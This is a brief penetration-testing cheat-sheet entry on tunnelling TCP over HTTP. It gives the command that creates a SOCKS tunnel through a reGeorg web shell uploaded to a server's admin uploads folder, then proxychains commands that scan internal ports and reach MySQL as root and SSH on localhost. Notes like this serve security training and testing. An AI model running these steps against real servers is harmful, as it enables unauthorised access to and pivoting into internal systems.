TCP over HTTP
For this technique, it is necessary to be able to upload a file to a webserver.
1. reGeorg
File upload to the server correct

Tunnel creation
python reGeorgSocksProxy.py -p 5555 -u "http://<ip>/admin/uploads/reGeorg.jsp"
Proxychains config

proxychains nmap -F -sT 127.0.0.1
proxychains mysql -u root -p -h 127.0.0.1
proxychains ssh localhost
